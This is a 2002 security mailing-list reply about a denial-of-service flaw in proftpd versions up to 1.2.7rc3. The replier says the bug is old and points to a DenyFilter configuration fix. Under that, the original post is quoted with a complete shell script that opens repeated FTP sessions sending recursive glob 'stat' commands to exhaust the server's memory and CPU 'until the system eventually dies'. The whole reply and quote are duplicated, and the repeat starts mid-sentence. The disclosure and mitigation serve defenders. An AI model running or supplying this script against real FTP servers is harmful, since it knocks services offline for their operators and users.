This is so old I can't even find any postings/articles I remember making on
it. Here is one link from early last year:
http://lwn.net/2001/0322/a/proftpd-dos.php3
Check the documentation:
DenyFilter \*.*/
Problem solved.
People should search Google before posting, it's far less embaressing.
Kurt Seifried, kurt (at) seifried (dot) org [email concealed]
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/
----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing (at) hio.hen (dot) nl [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <vulnwatch (at) vulnwatch (dot) org [email concealed]>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
> Hello,
>
> proftpd is vulnerable to denial of service similar to the list
> */../*/../*/../*.
>
> #!/bin/sh
> #
> # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> # might work against many other FTP daemons
> # consumes nearly all memory and alot of CPU
> #
> # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> #
> # 7-dec-02 - detach - www.duho.org
> #
> # use: ./prodos.sh <host> <user> <pass>
> # do this some more to make sure the system eventually dies
>
> cnt=25
> while [ $cnt -gt 0 ] ; do
> ftp -n << EOF&
> o $1
> quote user $2
> quote pass $3
> quote stat /*/*/*/*/*/*/*
> quit
> EOF
> let cnt=cnt-1
> done
> sleep 2
> killall -9 ftp
> echo DONE!
>
> #end
>
it. Here is one link from early last year:
http://lwn.net/2001/0322/a/proftpd-dos.php3
Check the documentation:
DenyFilter \*.*/
Problem solved.
People should search Google before posting, it's far less embaressing.
Kurt Seifried, kurt (at) seifried (dot) org [email concealed]
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/
----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing (at) hio.hen (dot) nl [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <vulnwatch (at) vulnwatch (dot) org [email concealed]>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
> Hello,
>
> proftpd is vulnerable to denial of service similar to the list
> */../*/../*/../*.
>
> #!/bin/sh
> #
> # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> # might work against many other FTP daemons
> # consumes nearly all memory and alot of CPU
> #
> # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> #
> # 7-dec-02 - detach - www.duho.org
> #
> # use: ./prodos.sh <host> <user> <pass>
> # do this some more to make sure the system eventually dies
>
> cnt=25
> while [ $cnt -gt 0 ] ; do
> ftp -n << EOF&
> o $1
> quote user $2
> quote pass $3
> quote stat /*/*/*/*/*/*/*
> quit
> EOF
> let cnt=cnt-1
> done
> sleep 2
> killall -9 ftp
> echo DONE!
>
> #end
>
[ reply ]